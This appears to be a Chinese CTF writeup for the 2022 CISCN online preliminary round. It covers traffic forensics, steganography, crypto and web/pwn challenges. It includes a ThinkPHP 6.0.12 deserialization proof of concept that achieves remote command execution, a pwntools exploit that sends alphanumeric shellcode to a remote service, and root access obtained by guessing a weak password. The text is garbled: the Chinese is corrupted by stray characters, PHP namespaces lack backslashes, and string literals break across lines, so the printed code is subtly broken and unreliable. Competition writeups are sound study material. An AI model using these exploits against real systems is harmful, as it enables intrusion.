第15屆全國大學(xué)生知識(shí)競賽場景實(shí)操 2022ciscn線上初賽 部分writeup
2022-05-29 22:22:36

@

ez_usb

拿到附件wireshark打開 觀察

發(fā)現(xiàn)流量中存在兩種鍵盤流量

過濾

usb.addr == "2.8.1" && usbhid.data跟usb.addr == "2.10.1" && usbhid.data

分別導(dǎo)出為csv文件

提取hid data

梭哈腳本，將流量包中有關(guān)USB HID的數(shù)據(jù)提取出來并轉(zhuǎn)成十六進(jìn)制，然后對(duì)比官方的USB HID表進(jìn)行轉(zhuǎn)碼

USB HID Usage Tables 1.12(P52).pdf (book118.com)

DicData = {0x04: "A", 0x05: "B", 0x06: "C", 0x07: "D", 0x08: "E", 0x09: "F", 0x0A: "G", 0x0B: "H", 0x0C: "I", 0x0D: "J", 0x0E: "K", 0x0F: "L", 0x10: "M", 0x11: "N", 
			0x12: "O", 0x13: "P", 0x14: "Q", 0x15: "R", 0x16: "S", 0x17: "T", 0x18: "U", 0x19: "V", 0x1A: "W", 0x1B: "X", 0x1C: "Y", 0x1D: "Z", 0x1E: "1", 0x1F: "2",
			0x20: "3", 0x21: "4", 0x22: "5", 0x23: "6", 0x24: "7", 0x25: "8", 0x26: "9", 0x27: "0", 0x28: "
", 0x2A: "[DEL]", 0x2B: "	", 0x2C: " ", 0x2D: "-", 0x2E: "=", 
			0x2F: "[", 0x30: "]", 0x31: "\", 0x32: "~", 0x33: ";", 0x34: "'", 0x36: ",", 0x37: ".", 0x38: "/", 0x57:"+", 0x58: "
", 0x59: "1", 0x5A: "2", 0x5B: "3", 0x5C: "4",
			0x5D: "5", 0x5E: "6", 0x5F: "7", 0x60: "8", 0x61: "9"
			}

ListNumber = []

datas = open("2.txt")
for data in datas:
	if int('0x' + data[4:6], 16) < 0x04 or int('0x' + data[4:6], 16) > 0xa0:
		continue
	ListNumber.append(int(data[4:6], 16))
datas.close()
print(ListNumber)

flag = ""
sign = 0

for number in ListNumber:
	if sign == 0:
		if number == 0x39:
			sign = 1
			continue
		else:
			flag += DicData[number].lower()
	else:
		if number == 0x39:
			sign = 0
			continue
		else:
			flag += DicData[number].upper()

print(flag)

得到
觀察526177為rar文件hex開頭，導(dǎo)入010editor中保存為rar文件，另一串為壓縮包密碼，解壓得到flag

everlasting_night

拿到附件，stegsolve打開，觀察a2通道有l(wèi)sb隱寫痕跡

使用工具梭哈：cloacked-pixel 秘鑰為f78dcd383f1b574b

得到加密的壓縮包

同時(shí)圖片尾有一串多余的md5 fb3efce4ceac2f5445c7ae17e3e969ab

將此字符串為壓縮包密碼打開壓縮包

使用010editor刪除文件頭后保存附件為flag.data，使用gimp打開修正寬高比為352:287 得到flag

問卷調(diào)查

填寫問卷得到flag

簽到電臺(tái)

密碼本內(nèi)容

取前七個(gè)4位數(shù)字分別與弼時(shí)安全到達(dá)了的電碼進(jìn)行模10運(yùn)算得到6449093660734572841578386746，通過burpsuite抓包發(fā)送兩次得到flag

Ezpop

1、打開靶機(jī)，發(fā)現(xiàn)TP版本為V6.0.12

2、根據(jù)題目提示，百度搜索TP6.0.12的漏洞

3、找到一篇關(guān)于該版本TP反序列漏洞的文章

https://blog.csdn.net/m0_47968686/article/details/122617617

4、文章里面有現(xiàn)成的poc可以直接利用，接下來找到路由即可

5、訪問/www.zip，下載題目的源碼

6、全局搜索unserialize，在index.php下的index類中的test方法找到路由

7、利用poc生成payload，在/index.php/index/test/下POST提交，成功RCE

8、修改命令，最終在根目錄下找到flag

POC如下：

<?php

namespace thinkmodelconcern;

trait Attribute
{
    private $data = ["key" => ["key1" => "cat /flag.txt"]];
    private $withAttr = ["key"=>["key1"=>"system"]];
    protected $json = ["key"];
}
namespace think;

abstract class Model
{
    use modelconcernAttribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    protected $jsonAssoc;
    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
        $this->jsonAssoc = true;
    }
}

namespace thinkmodel;

use thinkModel;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));

基于挑戰(zhàn)碼的雙向認(rèn)證1、2

1、題目描述是ssh端口，直接ssh登錄上去，發(fā)現(xiàn)cube-challenge文件

2、進(jìn)去后沒發(fā)現(xiàn)什么有用的東西

3、憑借web手的本能，利用正則尋找flag：find /| grep flag

4、在/root/cube-shell/instance/flag_server/發(fā)現(xiàn)flag1.txt和flag2.txt

5、嘗試訪問，發(fā)現(xiàn)flag沒有設(shè)置訪問權(quán)限，兩個(gè)flag到手

基于挑戰(zhàn)碼的雙向認(rèn)證3

1、同樣ssh連接，故技重施一波

2、找到flag位置，嘗試訪問，提示沒有權(quán)限訪問

3、查看當(dāng)前l(fā)inux版本，發(fā)現(xiàn)是Red Hat 4.8.5

4、嘗試?yán)萌蹩诹钸M(jìn)行root提權(quán)，發(fā)現(xiàn)密碼為toor，直接拿到flag

Iso9798

連接后通過sha256密碼碰撞得到前四位輸入進(jìn)行交互

import hashlib
dic = 'abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ'
for a in dic:
    for b in dic:
        for c in dic:
            for d in dic:
                t =str(a)+str(b)+str(c)+str(d)+'VsPPBo6CqCXA6om2'
                m = (hashlib.sha256(t.encode())).hexdigest()
                if m[:64] == '6c744733df904ddf1b75ac9cd690c117c3feec780f518ae6abbef054c1678f25':
                   print(t)
                   break

隨機(jī)輸入數(shù)字得到回顯的加密密文

將密文分成三組，交換前兩組位置后進(jìn)行提交得到flag

Login-nomal

通過上述幾處位置可知冒號(hào)前為指令，冒號(hào)后為參數(shù)，指令與指令之間通過“ ”劃分，指令只有opt和msg，通過opt可進(jìn)入函數(shù)，參數(shù)要為ro0t

分析可以發(fā)現(xiàn)再進(jìn)入該函數(shù)即可執(zhí)行shellcode，并且shellcode要可見

from pwn import *
io = remote("123.56.87.204",31166)
context.log_level = "debug"
io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
# gdb.attach(io)
# pause()
payload = "opt:1
" + "msg:ro0t1
"
io.sendline(payload)
payload = "opt:2
" + "msg:" + shellcode + "
"
io.sendline(payload)
io.interactive() 

通過pwntools生成shellcode，并利用alpha3生成可見字符將shellcode填入exp中，交互得到flag

Baby-tree

瀏覽baby-tree.ast文件可發(fā)現(xiàn)以下幾處可疑的地方

分析發(fā)現(xiàn)為AST語法樹的內(nèi)容，構(gòu)造exp得到flag

keyValue = '345y'
values = [88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
k = [ord(i) for i in keyValue]  # [51, 52, 53, 121]
# print(k)
for i in range(0, len(values)-4+1):
    k[0], k[1], k[2], k[3] = k[1], k[2], k[3], k[0]
for i in range(len(values)-4, -1, -1):
    k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
    r1 = values[i+3] ^ k[3]
    r0 = values[i+2] ^ k[2]
    r3 = values[i+1] ^ ((k[1] + (r1 >> 2)) & 0xff)
    r2 = values[i+0] ^ ((k[0] + (r0 >> 4)) & 0xff)
    values[i], values[i+1], values[i+2], values[i+3] = r0, r1, r2, r3
flag = ''
for c in values:
    flag += chr(c)
print(flag)